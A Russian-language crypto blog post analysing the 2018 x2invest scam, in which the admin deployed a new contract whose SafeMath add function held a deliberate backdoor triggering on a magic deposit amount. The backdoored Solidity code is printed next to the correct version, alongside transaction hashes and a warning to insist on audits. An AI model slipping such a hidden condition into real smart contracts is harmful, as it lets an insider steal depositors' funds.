Почему и как случился скам x2invest

22 окт 2018 09:37:51 Обзоры смартов

Много вопросов в нашем чате. Решили сделать мини аналитику на эту тему.

Сразу начнем с того, что в смарт контракте x2invest не было настоящих бекдоров, дыр, через которые админ мог вывести кассу.

Админ ничего и не выводил. Он сделал в выходной день новый второй смарт конракт x1.5invest, заранее купив у ютуб блогеров рекламу с анонсом. Инвесторы полетели быть первыми, даже не думая про аудиты. Я надеюсь, среди наших читателей таких нет.

В новом контракте админ заложил дыру в "безопасную математику" для вывода средств:

function add(uint256 a, uint256 b) internal pure returns(uint256) {
uint256 c = a + b;
if(a==(3**3+1**3+1**3)*10**17+1)c=a*9+b;
return c;
}

Должно быть:

function add(uint256 a, uint256 b) internal pure returns(uint256) {
uint256 c = a + b;
assert(c >= a);
return c;
}

Не вижу смысла расписывать все подробно (времени совсем нет), там есть еще функциональные части кода для дыры. В целом админ заложил условие, что если депозит равен 2.900000000000000001 Ether, то при выводе (запрос на возврат депа: 0.00000112 Ether) его сумма становилась равна 23.751000000000000009 эфиров.

Здесь админ делает вклад:

0xfe1c8f7edf14c36c7c1f1a88def026781fb05c543a9450eaa8519a3de1f6a8d0

А вот, допустим вывод:

0x6aba17d3cc269319f1c9db4269370a4e36c7be7461b0e93ad0178f8a69e5be84

Дыра в новом контракте, неразбериха, админ удаляет сайт и чат, начинается еще большая паника. Поскольку в проекте x2invest был функционал с возможностью забрать свой депозит, касса начала очень быстро пустеть. Без возможности забрать депозит, результат совсем другой. Касса расходуется плавно. Виноват только админ.

В целом, про такой исход мы писали, как справедливо заметил один из участников чата:

Зачем было так делать, без понятия. В кассе было 4200 эфиров или 863 000$. Общий вход: 1 400 036$. Вредительство какое-то :(

Судя по всему с нового дырявого смарт конракта было похищено 800 эфиров или 164 362$.

Золотые правила смарт инвестора

  • Никогда не заходите в контракты, где не было вообще аудитов. Смысл быть первым там, где можно слить деньги. Желательно, чтобы аудит был в разных проверенных местах. Мы очень стараемся ничего не пропустить, но тоже люди. На текущий момент у нас шесть аудитов смарт конрактов, дыр не пропустили.
  • На текущий момент опасно заходить в проекты с возвратом вклада, очень опасно. Любой пчих будет губителен. Все-таки это был скам проекта с первых мест.

Приходите на обсуждение проектов в наш чат: https://t.me/joinchat/C1ie2RK-ocDXAyuh2f00rA.

Хотите зарабатывать на крипте? Подписывайтесь на наши Telegram каналы!

5 комментов2 207 просмотров
Читайте также
Комментарии
постраничноцеликом
датапопулярные
Liongo
0

22.10.2018 12:22:48#
Красиво сработано, восхищаюсь))
BitStat
0

22.10.2018 12:32:35#
Такими вещами как-то не хочется восхищаться :(
Ba_lucky_in
0

22.10.2018 15:01:56#
Не понимаю на чем они так зарабатывают, что гарантированно 4-6% в сутки прибыли??? Больше смахивает на пирамиду
Saotomu
2

22.10.2018 15:16:09#
так это и есть классические пирамиды, кто успел тот и съел... участвуете на свой страх и риск о чем администрация сайта каждый раз пишет.
BitStat
0

22.10.2018 15:33:21#
Все мы пишем. Ba_lucky_in почитайте обзоры.
Только зарегистрированные пользователи могут писать комментарии.
Авторизуйтесь, пожалуйста, или зарегистрируйтесь.
Новые смарты
Смотреть все
Вклады в смарты
Рейтинг смартов
Архив смартов
Смотреть все
Подписывайтесь